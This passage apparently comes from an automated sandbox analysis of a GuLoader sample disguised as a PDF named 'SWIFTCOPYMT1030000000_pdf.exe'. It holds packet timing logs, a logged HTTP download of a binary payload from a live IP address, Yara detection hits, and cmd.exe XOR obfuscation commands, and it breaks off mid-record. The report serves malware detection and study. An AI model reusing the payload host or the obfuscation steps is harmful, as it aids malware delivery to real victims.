                                    Apr 26, 2024 13:39:22.126797915 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.126863956 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.126883030 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.126899958 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.126907110 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.126916885 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.126934052 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.126950979 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.126967907 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.127078056 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.127248049 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.127248049 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.127248049 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.374238968 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.374268055 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.374290943 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.374442101 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.374469995 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.374491930 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.374512911 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.374535084 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.374556065 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.374562979 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.374563932 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.374577999 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.374598980 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.374656916 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.374680042 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.374737024 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.374737024 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.374737024 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.374737024 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.374737024 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.374824047 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.374851942 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.374874115 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.374896049 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.374902010 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.374917030 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.374938965 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.374991894 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.375075102 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.375075102 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.375075102 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.375075102 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.375075102 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.375178099 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.375236034 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.375241995 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.375241995 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.375293016 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.375314951 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.375336885 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.375391006 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.375411987 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.375556946 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.375581980 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.375581980 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.375586033 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.375608921 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.375629902 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.375682116 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.375704050 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.375725031 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.375746012 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.375751019 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.375751019 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.375751019 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.375751019 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.375767946 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.375788927 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.375811100 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.375921011 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.375947952 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.375951052 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.375952959 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.375953913 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.376039982 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.376064062 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.376077890 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.376077890 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.376141071 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.376163960 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.376243114 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.376252890 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.376252890 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.376252890 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.376252890 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.376252890 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.376254082 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.376291990 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.376313925 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.376354933 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.376420021 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.376420021 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.376420021 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.376523972 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.376545906 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.376566887 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.376588106 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.376589060 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.376588106 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.376625061 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.376646996 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.376758099 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.376759052 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.376759052 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.376759052 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.376784086 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.376806021 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.376905918 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.376979113 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377029896 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377041101 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377052069 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377074957 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377091885 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377149105 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377160072 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377219915 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377245903 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377245903 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377245903 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377245903 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377377987 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377389908 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377402067 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377418041 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377518892 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377593040 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377650023 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377660990 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377671957 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377682924 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377698898 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377710104 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377749920 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377757072 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377757072 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377757072 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377762079 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377773046 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377784014 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377804995 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377856970 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377867937 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377907991 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377918959 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377927065 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377927065 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377927065 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377927065 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377927065 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377929926 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377940893 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377962112 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378020048 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378031015 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378041983 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378052950 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378091097 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378096104 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.378221035 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378266096 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.378266096 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.378266096 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.378272057 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378283024 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378293991 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378304958 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378341913 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378396988 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378468037 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378540039 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378552914 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378563881 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378606081 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.378606081 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.378606081 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.378720999 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378774881 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378776073 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.378786087 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378797054 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378808022 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378818989 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378879070 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378890038 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378901005 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378911972 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378947020 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.378947020 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.378947020 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.378947020 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.378947020 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.378966093 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379021883 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379116058 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379116058 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379116058 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379116058 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379127026 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379244089 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379255056 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379285097 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379285097 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379295111 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379306078 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379317045 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379328012 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379348993 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379403114 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379414082 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379425049 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379436016 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379446983 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379456997 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379456997 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379456997 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379456997 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379457951 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379498959 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379511118 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379616022 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379626989 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379626989 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379626989 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379626989 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379626989 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379626989 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379626989 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379626989 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379641056 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379755974 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379767895 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379795074 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379892111 CEST805034194.156.8.104192.168.11.20
                                    • 94.156.8.104
                                    Session ID: 0 | Source IP: 192.168.11.20 | Source Port: 50341 | Destination IP: 94.156.8.104 | Destination Port: 80 | PID: 1268 | Process: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Apr 26, 2024 13:39:21.111854076 CEST | 168 | OUT | GET /yFtqL16.bin HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                    Host: 94.156.8.104
                                    Cache-Control: no-cache
                                    Apr 26, 2024 13:39:21.364439964 CEST | 1289 | IN | HTTP/1.1 200 OK
                                    Date: Fri, 26 Apr 2024 11:39:21 GMT
                                    Server: Apache/2.4.41 (Ubuntu)
                                    Last-Modified: Thu, 25 Apr 2024 23:00:20 GMT
                                    ETag: "78c40-616f3c0562900"
                                    Accept-Ranges: bytes
                                    Content-Length: 494656
                                    Content-Type: application/octet-stream


                                    Target ID:6
                                    Start time:13:38:22
                                    Start date:26/04/2024
                                    Path:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"
                                    Imagebase:0x400000
                                    File size:421'592 bytes
                                    MD5 hash:1048340BCFAE30DF032C161AC52F8F0E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000006.00000002.134274135976.0000000000863000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000006.00000002.134274135976.000000000081E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.134275655794.00000000085F6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    Target ID:7
                                    Start time:13:38:23
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "250^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:8
                                    Start time:13:38:23
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:9
                                    Start time:13:38:23
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "244^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:10
                                    Start time:13:38:23
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:11
                                    Start time:13:38:23
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "227^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:12
                                    Start time:13:38:23
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:13
                                    Start time:13:38:23
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "255^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:14
                                    Start time:13:38:23
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:15
                                    Start time:13:38:23
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "244^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:16
                                    Start time:13:38:23
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:17
                                    Start time:13:38:23
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "253^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:18
                                    Start time:13:38:23
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:19
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "130^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:20
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:21
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "131^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:22
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
